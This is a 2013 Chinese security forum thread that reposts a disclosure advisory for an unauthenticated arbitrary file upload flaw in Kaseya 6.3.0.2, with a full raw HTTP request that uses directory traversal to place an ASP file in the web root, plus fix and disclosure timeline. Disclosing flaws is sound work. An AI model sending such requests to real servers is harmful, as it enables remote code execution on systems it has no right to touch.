查看: 12641|回复: 2

Kaseya 6.3.0.2——任意文件上传漏洞

[复制链接]

该用户从未签到

发表于 2013-11-27 21:20:43 | 显示全部楼层 |阅读模式
现在论坛要清理人了,伤不起啊,小白我只好浮出水面来发发帖啦{:soso_e101:},今天给大家带来一个卡西亚的文件上传漏洞~~~~有交流才有进步嘛!!
[AppleScript] 纯文本查看 复制代码
Kaseya 6.3.0.2 Shell Upload Vulnerability
 
+-----------+ 
|Description| 
+-----------+ 
 
Kaseya 6.3 suffers from an Arbitrary File Upload vulnerability that can be leveraged to gain remote code 
execution on the Kaseya server. The code executed in this way will run with a local IUSR account’s privileges. 
The vulnerability lies within the /SystemTab/UploadImage.asp file. This file constructs a file object on disk using user input, without first checking if the user is authenticated or if input is valid. The application preserves the file name and extension of the upload, and allows an attacker to traverse from the default destination directory. 
Directory traversal is not necessary to gain code execution however, as the default path lies within the 
application’s web-root. 
 
 
+------------+ 
|Exploitation| 
+------------+ 
 
POST /SystemTab/uploadImage.asp?filename=..\..\..\..\test.asp HTTP/1.1 
Host: <host> 
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0 
FirePHP/0.7.2 
Referer: http://<host>/SystemTab/uploadImage.asp 
Cookie: ASPSESSIONIDQATSBAQC=<valid session>; 
Connection: keep-alive 
Content-Type: multipart/form-data; boundary=---------------------------
19172947220212 
Content-Length: 89 
  
-----------------------------19172947220212 
Content-Disposition: form-data; name="uploadFile"; filename="test.asp" 
Content-Type: application/octet-stream 
  
<!DOCTYPE html> 
<html> 
<body> 
<% 
response.write("Hello World!") 
%> 
</body> 
</html> 
  
-----------------------------19172947220212--
 
+-----+ 
| Fix | 
+-----+ 
 
Install the patch released by the vendor on the 12th of November 2013.
 
+-------------------+ 
|Disclosure Timeline| 
+-------------------+ 
 
9/10/2013 Bug discovered, vendor contacted 
20/10/2013 Vendor responds with email address for security contact. Advisory sent to security contact. 
30/10/2013 Vendor advises that patch for the reported issue is to be included in next patch cycle. 
12/11/2013 Patch released. 
18/11/2013 Advisory publically released.
 
# 367F776591AF6123   1337day.com [2013-11-27]   6875A302C6DF2316 #
回复

使用道具 举报

  • TA的每日心情
    擦汗
    2017-6-6 13:33
  • 签到天数: 53 天

    [LV.5]常住居民I

    发表于 2013-11-27 23:29:40 | 显示全部楼层
    {:soso_e147:}表示小白我看不懂

    点评

    我也是小白的说,大家多交流嘛  详情 回复 发表于 2013-11-27 23:31
    回复 支持 反对

    使用道具 举报

    该用户从未签到

     楼主| 发表于 2013-11-27 23:31:47 | 显示全部楼层
    夜尽天明 发表于 2013-11-27 23:29
    表示小白我看不懂

    我也是小白的说,大家多交流嘛
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-24 11:17 , Processed in 0.027821 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部